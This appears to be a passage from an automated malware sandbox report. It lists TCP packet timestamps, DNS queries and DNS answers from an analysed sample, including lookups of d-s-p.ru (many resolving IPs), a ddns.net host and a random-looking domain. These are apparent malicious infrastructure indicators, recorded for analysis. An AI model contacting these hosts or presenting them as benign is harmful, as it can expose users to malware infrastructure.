                                                                                                                                                                                Dec 30, 2024 19:46:01.403624058 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.403640032 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.403863907 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.403878927 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.403928041 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.403934002 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.403947115 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.404668093 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.404689074 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.488388062 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.488406897 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.488477945 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.488491058 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.488753080 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.488773108 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.488806009 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.488812923 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.488830090 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.488859892 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.489018917 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.489034891 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.489068985 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.489074945 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.489088058 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.489110947 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.489320993 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.489336014 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.489375114 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.489379883 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.489408970 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.489418983 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.489490032 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.489511013 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.489548922 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.489554882 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.489576101 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.489583015 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.489820957 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.489835024 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.489878893 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.489883900 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.489902973 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.489917994 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.490003109 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.490016937 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.490065098 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.490070105 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.490243912 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.490262985 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.490292072 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.490297079 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.490310907 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.490338087 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.492677927 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.574635029 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.574652910 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.574738026 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.574753046 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.574775934 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.574796915 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.575001001 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.575016022 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.575062990 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.575067997 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.575088978 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.575104952 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.575212002 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.575226068 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.575265884 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.575270891 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.575294971 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.575503111 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.575521946 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.575537920 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.575542927 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.575557947 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.575577974 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.575607061 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.575748920 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.575777054 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.575822115 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.575826883 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.575864077 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.576076984 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.576095104 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.576133966 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.576141119 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.576160908 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.576176882 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.576395035 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.576409101 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.576461077 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.576468945 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.576510906 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.576541901 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.576555014 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.576591015 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.576596022 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.576621056 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.576628923 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.578569889 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.675496101 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.675512075 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.675571918 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.675580978 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.675610065 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.675628901 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.675724030 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.675738096 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.675785065 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.675790071 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.675811052 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.675822973 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.675827980 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.675837040 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.675848961 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.675882101 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.675889015 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.675904036 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.675935984 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.675940037 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.675956964 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.675970078 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676080942 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676095009 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676137924 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676142931 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676163912 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676177979 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676223040 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676235914 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676276922 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676284075 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676297903 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676311016 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676420927 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676435947 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676475048 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676481009 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676501036 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676517010 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676752090 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676789999 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676805973 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676814079 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676835060 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.676836967 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676852942 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.676879883 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.679217100 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.723332882 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.723332882 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:46:01.723349094 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.723357916 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.928291082 CET5007980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:46:01.933113098 CET805007958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.933175087 CET5007980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:46:01.933288097 CET5007980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:46:01.933303118 CET5007980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:46:01.938114882 CET805007958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:01.938123941 CET805007958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:03.408464909 CET805007958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:03.408493042 CET805007958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:03.408509016 CET805007958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:03.408545017 CET5007980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:46:03.408576012 CET5007980192.168.2.458.151.148.90

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Dec 30, 2024 19:42:19.672106981 CET5228953192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:42:20.661730051 CET5228953192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:42:21.690002918 CET5228953192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:42:22.089108944 CET53522891.1.1.1192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:22.089123011 CET53522891.1.1.1192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:22.089132071 CET53522891.1.1.1192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:42:55.179428101 CET5957853192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:42:55.213866949 CET53595781.1.1.1192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:44:51.218338966 CET6310953192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:44:52.397526979 CET6310953192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:44:53.401673079 CET6310953192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:44:53.701268911 CET53631091.1.1.1192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:44:53.701332092 CET53631091.1.1.1192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:44:53.701359987 CET53631091.1.1.1192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:09.293055058 CET5176053192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:45:09.342211008 CET53517601.1.1.1192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:37.146291971 CET5684853192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:45:37.369328976 CET53568481.1.1.1192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:40.364876986 CET5948253192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:45:40.928714991 CET53594821.1.1.1192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:51.298674107 CET6290753192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:45:51.307658911 CET53629071.1.1.1192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:54.638041973 CET4994753192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:45:54.779248953 CET53499471.1.1.1192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:46:06.095504999 CET5046753192.168.2.41.1.1.1
                                                                                                                                                                                Dec 30, 2024 19:46:06.104362011 CET53504671.1.1.1192.168.2.4

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                Dec 30, 2024 19:42:19.672106981 CET192.168.2.41.1.1.10xddfaStandard query (0)d-s-p.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:20.661730051 CET192.168.2.41.1.1.10xddfaStandard query (0)d-s-p.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:21.690002918 CET192.168.2.41.1.1.10xddfaStandard query (0)d-s-p.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:55.179428101 CET192.168.2.41.1.1.10xc022Standard query (0)midginvineco.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:51.218338966 CET192.168.2.41.1.1.10x361cStandard query (0)d-s-p.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:52.397526979 CET192.168.2.41.1.1.10x361cStandard query (0)d-s-p.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.401673079 CET192.168.2.41.1.1.10x361cStandard query (0)d-s-p.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:45:09.293055058 CET192.168.2.41.1.1.10xe04dStandard query (0)www.tazc.com.myA (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:45:37.146291971 CET192.168.2.41.1.1.10xe8f0Standard query (0)upadaria.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:45:40.364876986 CET192.168.2.41.1.1.10x3c69Standard query (0)lotuseffectllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:45:51.298674107 CET192.168.2.41.1.1.10x4e64Standard query (0)webdot.ddns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:45:54.638041973 CET192.168.2.41.1.1.10xeb88Standard query (0)firemane.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:46:06.095504999 CET192.168.2.41.1.1.10x1ab2Standard query (0)kdtIFBJmLPfUAdsjOyiinDxA.kdtIFBJmLPfUAdsjOyiinDxAA (IP address)IN (0x0001)false

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                Dec 30, 2024 19:42:22.089108944 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089108944 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089108944 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru102.189.2.79A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089108944 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru102.220.140.62A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089108944 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089108944 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru189.195.132.134A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089108944 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089108944 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru41.248.133.57A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089108944 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru181.128.92.66A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089108944 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089123011 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089123011 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089123011 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru102.189.2.79A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089123011 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru102.220.140.62A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089123011 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089123011 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru189.195.132.134A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089123011 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089123011 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru41.248.133.57A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089123011 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru181.128.92.66A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089123011 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089132071 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089132071 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089132071 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru102.189.2.79A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089132071 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru102.220.140.62A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089132071 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089132071 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru189.195.132.134A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089132071 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089132071 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru41.248.133.57A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089132071 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru181.128.92.66A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:22.089132071 CET1.1.1.1192.168.2.40xddfaNo error (0)d-s-p.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:42:55.213866949 CET1.1.1.1192.168.2.40xc022No error (0)midginvineco.com23.145.40.181A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701268911 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701268911 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701268911 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru102.189.2.79A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701268911 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru102.220.140.62A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701268911 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701268911 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru189.195.132.134A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701268911 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701268911 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru41.248.133.57A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701268911 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru181.128.92.66A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701268911 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701332092 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701332092 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701332092 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru102.189.2.79A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701332092 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru102.220.140.62A (IP address)IN (0x0001)false
                                                                                                                                                                                Dec 30, 2024 19:44:53.701332092 CET1.1.1.1192.168.2.40x361cNo error (0)d-s-p.ru109.98.58.98A (IP address)IN (0x0001)false
